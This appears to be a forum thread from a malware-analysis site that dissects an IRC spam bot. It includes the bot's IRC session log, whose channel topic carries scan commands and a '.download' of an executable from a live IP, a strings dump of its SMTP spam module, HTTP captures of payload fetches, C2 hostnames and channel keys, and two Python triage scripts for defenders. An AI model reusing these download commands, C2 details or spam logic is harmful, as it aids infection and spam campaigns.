
New IrnBot / Rinbot pokes at Offensive Computing

IrnBot is getting more personal it seems.

The bot does the following depending on what server it's on:
JOIN ##OC hellovalsmit

I guess he's a fan of the site? Why not contribute positively here instead of making a bunch of negative malware?

You'll notice the IRC channel name is #OC and the leet speak spelling of OffensiveComputing.
I guess the malware author is a fan of our site? :) Or maybe we will see an Anti Offensive Computing Rant similar to the Symantec / CNN one?

I joined up to his IRC server and it redirected me to a channel called #bye and then kicked / banned me from the server, but not before I saw the nick "bshfcker".

NICK [XP|USA|P|01|ieUcIXxu]
USER XP-USA 0 0 :[XP|USA|P|01|ieUcIXxu]
:s010.xnet.net NOTICE AUTH :*** Looking up your hostname...
:s010.xnet.net NOTICE AUTH :*** Found your hostname
:s010.xnet.net NOTICE [XP|USA|P|01|ieUcIXxu] :*** If you are having problems connecting due to ping timeouts, please type /quote pong D3B1FDB3 or /raw pong D3B1FDB3 now.
PING :D3B1FDB3
PONG :D3B1FDB3
:s010.xnet.net 001 [XP|USA|P|01|ieUcIXxu] :Welcome to the xnet IRC Network [XP|USA|P|01|ieUcIXxu]!XP-USA@
:s010.xnet.net 002 [XP|USA|P|01|ieUcIXxu] :Your host is s010.xnet.net, running version Unreal3.2.5
:s010.xnet.net 003 [XP|USA|P|01|ieUcIXxu] :This server was created Sat Feb 25 19:37:48 2006
:s010.xnet.net 004 [XP|USA|P|01|ieUcIXxu] s010.xnet.net Unreal3.2.5 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:s010.xnet.net 005 [XP|USA|P|01|ieUcIXxu] NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server
:s010.xnet.net 005 [XP|USA|P|01|ieUcIXxu] WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=xnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server
:s010.xnet.net 005 [XP|USA|P|01|ieUcIXxu] CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
MODE [XP|USA|P|01|ieUcIXxu] -x
JOIN ##OC hellovalsmit

:s013.xnet.net 332 [XP|USA|P|00|suqbIHLe] ##OC :.scan.stop
- -s;.scan.start N 30 -s;.scan.start N 30 -a -s;.scan.start N x.x.x.x 30
- -s;.scan.start M 15 -a -s;.scan.start M 15 -s;.scan.start M x.x.x.x 15
- -s;.scan.start S 15 -a -s;.scan.start S 15 -s;.scan.start S x.x.x.x 15
- -s;.download Off3ns1v3C0mputingD0wnload http://210.22.13.118/MS.exe
c:\m.exe -e -s

Notice also:

:s010.xnet.net NOTICE [XP|USA|P|01|ieUcIXxu] :*** If you are having problems connecting due to ping timeouts, please type /quote pong D3B1FDB3 or /raw pong D3B1FDB3 now.
PING :D3B1FDB3
PONG :D3B1FDB3

If you decode this hex it's 211.177.253.179 (I'm guessing it's an IP, so I added the dots) and the IP is in Seoul, Korea. I don't know if this is right.
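Reading a capture like the one above by hand works once; the following Python is an added example (not code from the thread or from Offensive Computing) of pulling the same indicators out of an IRC session log automatically: bot-style nicks, the channel and key the bot joins, the PING cookie decoded as an IPv4 address the way the poster did, and the channel topic split into the ';'-separated commands the bot executes, including any .download targets. The sample session is constructed from the values quoted in the post (single-line topic, no server numerics); whether the PING cookie is really an address or only an anti-spoof nonce is not settled in the thread, so the decode is reported as a lead, not a fact.

```python
import re
from ipaddress import IPv4Address

# Constructed sample session in the style of the captures in the thread. The nicks,
# channel, key, PING cookie and topic commands are copied from the post; the layout
# (a single-line topic, no server numerics) is my simplification.
SAMPLE_SESSION = r"""
NICK [XP|USA|P|01|ieUcIXxu]
USER XP-USA 0 0 :[XP|USA|P|01|ieUcIXxu]
PING :D3B1FDB3
PONG :D3B1FDB3
JOIN ##OC hellovalsmit
:s013.xnet.net 332 [XP|USA|P|00|suqbIHLe] ##OC :.scan.stop -s;.scan.start N 30 -s;.scan.start M 15 -s;.download Off3ns1v3C0mputingD0wnload http://210.22.13.118/MS.exe c:\m.exe -e -s
"""

# Bot-style nick: a bracketed, pipe-separated tag such as [XP|USA|P|01|ieUcIXxu]
# or [XP|L|USA|00]-owaiaehx (OS | country | ... | random id).
BOT_NICK_RE = re.compile(r"^\[(?:[^\]|]+\|){2,}[^\]|]+\]")


def parse_irc_line(line):
    """Split an IRC line into (prefix, command, params); the trailing ' :' param is kept whole."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    command = params[0] if params else ""
    return prefix, command, params[1:]


def decode_ping_token(token):
    """Interpret an 8-hex-digit PING cookie as a big-endian IPv4 address, as the post does.
    Returns None for anything that is not 8 hex digits (e.g. a server name)."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return None
    return str(IPv4Address(int(token, 16)))


def parse_topic_commands(topic):
    """The bot treats the channel topic as a ';'-separated command list."""
    return [c.strip() for c in topic.split(";") if c.strip()]


def download_targets(commands):
    """From '.download <name> <url> <local path> ...' commands, return (url, local_path) pairs."""
    targets = []
    for cmd in commands:
        tokens = cmd.split()
        if tokens and tokens[0] == ".download":
            for i, tok in enumerate(tokens):
                if tok.startswith("http://") and i + 1 < len(tokens):
                    targets.append((tok, tokens[i + 1]))
                    break
    return targets


def triage_session(text):
    """Summarise a captured IRC session: bot-style nicks, channel joins (with keys),
    PING cookies decoded as IPv4, topic commands and download targets."""
    report = {"bot_nicks": set(), "joins": [], "ping_ips": [], "topic_commands": []}
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        _prefix, command, params = parse_irc_line(raw)
        if command == "NICK" and params and BOT_NICK_RE.match(params[0]):
            report["bot_nicks"].add(params[0])
        elif command == "JOIN" and params:
            report["joins"].append((params[0], params[1] if len(params) > 1 else None))
        elif command == "PING" and params:
            ip = decode_ping_token(params[0])
            if ip:
                report["ping_ips"].append(ip)
        elif command == "332" and len(params) >= 3:  # RPL_TOPIC: <nick> <channel> :<topic>
            report["topic_commands"].extend(parse_topic_commands(params[2]))
    report["downloads"] = download_targets(report["topic_commands"])
    return report


if __name__ == "__main__":
    for key, value in triage_session(SAMPLE_SESSION).items():
        print(f"{key}: {value}")
```

The topic parser is the part worth keeping around: with this family the channel topic is the command channel, so a topic change on the C2 server is the event to alert on, and the .download pairs give you the URL and drop path to block and hunt for.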

I thought this was funny:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Zone Alarm Security
C:\WINDOWS\system32\zlcint.exe

Seems like it has added VMware detection to its anti analysis bag of tricks, but disabling acceleration in VMware takes care of this issue.

I've unpacked it and the contents seem very similar.

Opens ports 4736 TCP, 56002 TCP and 69 UDP (the first two are probably random).

Drops C:\WINDOWS\system32\zlclint.exe and C:\WINDOWS\lsasrv.exe

Inside lsasrv.exe

http//ww.spamhaus.org/query/blip
is listed in the
http//ww.filesdatabase.com/azenv.php
http//ww.internetsec.org/azenv.php
http//kasupke.redio.de/azenv.php
http//ww.proxy.us.pl/azenv.php
http//anonymousjudge.noip.org/azenv.php

IrcConnect
sdelsvc.cmd
2 goto repeat2
repeat2
1 goto repeat
repeat
comspec
SYSTEM\CurrentControlSet\Services\s
Start
ImagePath
ServicesActive
dnsapi.dll
DnsQuery_A
DnsRecordListFree
DnsQueryConfig
u.u.u.u.INADDR.ARPA
smtp.send
smtp.init
smtp.stop
.smtp. stopped current task.
.smtp. failed to stop, not running.
IrcRead
mx.sbn01.to
cbiz
csend
ircd.myadv.biz
mail.ru
lsasrv.exe
s/getMail.phpid
mails.queue
.smtp. failed to initialise mails.queue.
.smtp. no active campaign.
stim
s/getTemplate.phpid
s/getTemplate.phpid
.smtp. failed to initialise body.plain.
s/getTemplate.phpid
.smtp. failed to initialise body.html.
sthe
s/getTemplate.phpid
.smtp. failed to initialise headers.mail.
s mails
.smtp. initialised project
.smtp. failed to initialise config.
.download. saved
.smtp. stopped mailing.
spamhaus.org.
.smtp. failed to initialise rbl
s connection failed.
.smtp. failed to initialise mx
.smtp. initialised SMTP domain
s helo
MessageID
From
ReplyTo
Subject s
Date s
NextPart
_s_.3u_.4u_.8X..8X
boundary
multipart/alternative
type
headers.mail
boundary
charset
body.plain
charset
body.html
ContentID
name

contacts

File: lsasrv_dmp.exe_
MD5: 030e05998229174c4987b3ebaa31254d
Size: 372738

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
$x79
$y7D$x79
$x7T
$x79
$x7Rich
QUIT
--%s
Content-Type: image/%s;
name="%s.%s"
Content-Transfer-Encoding: base64
Content-ID:
image.b64
--%s--
body.html
--%s
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
body.plain
--%s
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
--%s
Content-Type: multipart/alternative;
boundary="%s"
This is a multi-part message in MIME format.
headers.mail
Content-Type: multipart/related;
type="multipart/alternative";
boundary="%s"
----=_%s_%.3u_%.4u_%.8X.%.8X
NextPart
MIME-Version: 1.0
Date: %s
Subject: %s
To: "%s"
Reply-To:
From: "%s"
Message-ID:
Received: from %s ([%s] helo=%s)
by %s with smtp
id %s
for %s; %s
DATA
RCPT TO:
MAIL FROM:
PRIVMSG %s :>> .[smtp]. initialised SMTP: (domain): "%s" (mx): "%s".
JOIN %s %s
PRIVMSG %s :>> .[smtp]. failed to initialise: (mx): "%s" connection failed.
PRIVMSG %s :>> .[smtp]. failed to initialise: (rbl): "spamhaus.org".
%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
%s %s
PRIVMSG %s :>> .[smtp]. stopped mailing.
SMTPd
_IMAGE_ID_
HELO %s
EHLO %s
http://
PRIVMSG %s :>> .[download]. (saved): "%s" (to): "%s"
) v1.0b
%s?v=a
SMTPi
PRIVMSG %s :>> .[smtp]. failed to initialise config.
PRIVMSG %s :>> .[smtp]. initialised (project): "%s" (url): "%s" (mails): "%d".
PRIVMSG %s :>> .[smtp]. failed to initialise: "headers.mail".
%s/getTemplate.php?id=%s&t=he
PRIVMSG %s :>> .[smtp]. failed to initialise: "body.html".
%s/getTemplate.php?id=%s&t=ht
PRIVMSG %s :>> .[smtp]. failed to initialise: "body.plain".
%s/getTemplate.php?id=%s&t=tx
%s/getTemplate.php?id=%s&t=im
PRIVMSG %s :>> .[smtp]. no active campaign.
PRIVMSG %s :>> .[smtp]. failed to initialise: "mails.queue".
mails.queue
%s/getMail.php?id=%s
%s?v=a&s=1
lsasrv.exe
a89bb382bbad8aa85b08f65ba0ffa574
LSA Server
Local Security Authority Subsystem Library
Responsible for enforcing the security policy on the system.
mail.ru
81.93.100.123
ircd.myadv.biz
4n0th3rk3y
#csend#
#cbiz#
s0m3k3y
mx.sbn01.to
IrcRead
USER %s %s %s :%s
NICK %s
ERROR
KICK
PONG %s
PING
PART
JOIN
QUIT
TOPIC
MODE
PRIVMSG %s :>> .[smtp]. failed to stop, not running.
PRIVMSG %s :>> .[smtp]. stopped current task.
+smtp.stop
+smtp.init
+smtp.send
http
%u.%u.%u.%u.IN-ADDR.ARPA
DnsQueryConfig
DnsRecordListFree
DnsQuery_A
dnsapi.dll
%02.2x
ServicesActive
ImagePath
Start
SYSTEM\CurrentControlSet\Services\%s
SYSTEM
%%comspec%% /c %s %s %s
@echo off
:repeat
del "%%1"
if exist "%%1" goto repeat
:repeat2
del "%%2"
if exist "%%2" goto repeat2
%sdelsvc.cmd
%s%s
IrcConnect
http://anonymous-judge.no-ip.org/azenv.php
http://www.proxy.us.pl/azenv.php
http://kasupke.redio.de/azenv.php
http://www.internetsec.org/azenv.php
REMOTE_ADDR =
http://www.filesdatabase.com/azenv.php
is listed in the
http://www.spamhaus.org/query/bl?ip=%s

x.anti-viral.us
www.filesdatabase.com
90.95.121.65.IN-ADDR.ARPA
mx.sbn01.to
is.wayne.brady.gonna.have.to.chokeabitch.us
x.rofflewaffles.us
x.anti-viral.us
is.wayne.brady.gonna.have.to.chokeabitch.us
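A strings dump like the one above is where most of the capability assessment in this thread comes from, and the sorting is mechanical enough to script. The following Python is an added example (not code from the thread or from Offensive Computing) that buckets each string into the indicator class a triage analyst cares about (C2 URL templates, hosts, IPs, IRC command verbs, bot status messages and the module names inside them, registry paths, batch-script fragments, MIME template lines, hash-like strings) and then derives capability tags from the buckets, so the spam engine, the spamhaus self-check, the azenv.php external-IP lookup, the service persistence and the self-delete script all fall out of one pass. The sample input is a constructed excerpt of lines quoted in the post; the selection and order are mine.

```python
import re
from collections import defaultdict

# Constructed excerpt of an ASCII strings dump, using lines quoted in the post above;
# the selection and order are mine, not the complete dump.
SAMPLE_STRINGS = r"""
PRIVMSG %s :>> .[smtp]. failed to initialise config.
PRIVMSG %s :>> .[smtp]. failed to initialise: (rbl): "spamhaus.org".
PRIVMSG %s :>> .[download]. (saved): "%s" (to): "%s"
%s/getTemplate.php?id=%s&t=he
%s/getMail.php?id=%s
http://www.spamhaus.org/query/bl?ip=%s
is listed in the
http://www.filesdatabase.com/azenv.php
REMOTE_ADDR =
ircd.myadv.biz
mail.ru
81.93.100.123
SYSTEM\CurrentControlSet\Services\%s
%%comspec%% /c %s %s %s
@echo off
:repeat
del "%%1"
if exist "%%1" goto repeat
+smtp.init
+smtp.send
+smtp.stop
a89bb382bbad8aa85b08f65ba0ffa574
Content-Type: multipart/alternative;
Content-Transfer-Encoding: quoted-printable
"""

STATUS_RE = re.compile(r"^PRIVMSG %s :>> \.\[(\w+)\]\. ")   # bot status report: ".[module]. text"
IRC_CMD_RE = re.compile(r"^\+\w+\.\w+$")                      # command verbs such as +smtp.init
URL_RE = re.compile(r"^(?:https?://|%s/)\S+$")               # literal URL or C2 path template
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
HOST_RE = re.compile(r"^(?=.*[a-z])[a-z0-9-]+(?:\.[a-z0-9-]+)+$", re.I)
MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.I)
BATCH_RE = re.compile(r"^(?:@echo off|:\w+$|del |if exist |goto |%%comspec%%)", re.I)
MIME_PREFIXES = ("content-type:", "content-transfer-encoding:", "content-id:", "mime-version:")


def classify_strings(text):
    """Bucket each string into the indicator class a triage analyst cares about."""
    report = defaultdict(list)
    for s in text.splitlines():
        s = s.strip()
        if not s:
            continue
        m = STATUS_RE.match(s)
        if m:
            report["modules"].append(m.group(1))
            report["status_messages"].append(s)
        elif IRC_CMD_RE.match(s):
            report["irc_commands"].append(s)
        elif URL_RE.match(s):
            report["urls"].append(s)
        elif IPV4_RE.match(s):
            report["ips"].append(s)
        elif HOST_RE.match(s):
            report["hosts"].append(s)
        elif MD5_RE.match(s):
            report["hashes"].append(s)
        elif "CurrentControlSet" in s or s.startswith("HKEY_"):
            report["registry"].append(s)
        elif BATCH_RE.match(s):
            report["batch"].append(s)
        elif s.lower().startswith(MIME_PREFIXES):
            report["mime"].append(s)
    report["modules"] = sorted(set(report["modules"]))
    return dict(report)


def infer_capabilities(report):
    """Turn the buckets into capability tags; each rule names the strings it rests on."""
    caps = set()
    urls = " ".join(report.get("urls", []))
    batch = [b.lower() for b in report.get("batch", [])]
    if report.get("irc_commands") or report.get("status_messages"):
        caps.add("irc-c2")                    # commands and status reports go over IRC PRIVMSG
    if "smtp" in report.get("modules", []) and report.get("mime"):
        caps.add("spam-engine")               # smtp module plus MIME template fragments
    if "spamhaus.org" in urls:
        caps.add("rbl-self-check")            # bot checks whether its own IP is blocklisted
    if "azenv.php" in urls:
        caps.add("external-ip-discovery")     # environment-echo page used to learn REMOTE_ADDR
    if any("CurrentControlSet\\Services" in r for r in report.get("registry", [])):
        caps.add("service-persistence")
    if any(b.startswith("del ") for b in batch) and any("goto" in b for b in batch):
        caps.add("self-delete-script")        # delete-until-gone loop run via %comspec%
    return caps


if __name__ == "__main__":
    report = classify_strings(SAMPLE_STRINGS)
    for bucket, items in report.items():
        print(f"{bucket}: {items}")
    print("capabilities:", sorted(infer_capabilities(report)))
```

Feed it the output of `strings` on the unpacked sample rather than the packed one; on the packed binary almost nothing lands in a bucket, which is itself a useful signal that unpacking is still needed.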

gets http://217.67.229.212/phpbb/uploads/jpb.exe -> C:\jpb.exe

-> 217.67.229.212:80
GET /phpbb/uploads/jpb.exe HTTP/1.1
User-Agent: Mozilla/5.0
Host: 217.67.229.212

---------------------------------------------------------------------------
(binary response body, not reproduced)

-> 207.210.95.154:80
GET /azenv.php HTTP/1.0
Host: www.filesdatabase.com
Pragma: no-cache

---------------------------------------------------------------------------

AZ Environment variables 1.04

---------------------------------------------------------------------------

81.93.100.123 : 6019


USER [XP|L|USA|00]-owaiaehx [XP|L|USA|00]-owaiaehx [XP|L|USA|00]-owaiaehx :XPWORK
NICK [XP|L|USA|00]-owaiaehx
:03.main.ru 001 [XP|L|USA|00]-owaiaehx :Cisco
:03.main.ru 005 [XP|L|USA|00]-owaiaehx
:03.main.ru 422 [XP|L|USA|00]-owaiaehx :
:[XP|L|USA|00]-owaiaehx MODE [XP|L|USA|00]-owaiaehx :+i
JOIN #c s0m3k3y
:[XP|L|USA|00]-owaiaehx!~XPLUSA@poo-tee-weet JOIN :#c
:03.main.ru 332 [XP|L|USA|00]-owaiaehx #c :+
:03.main.ru 333 [XP|L|USA|00]-owaiaehx #c bshfkgn 1173304447
:03.main.ru 353 [XP|L|USA|00]-owaiaehx @ #c :[XP|L|USA|00]-owaiaehx 
:03.main.ru 366 [XP|L|USA|00]-owaiaehx #c :End of /NAMES list.
PING :03.main.ru
PONG :03.main.ru

Not very stealthy

also

Thanks for finding that Zone Alarm registry key, chamuco; it was killing my regmon.

V.

download

Where is the link to download this?

Thanks

John

Here is the link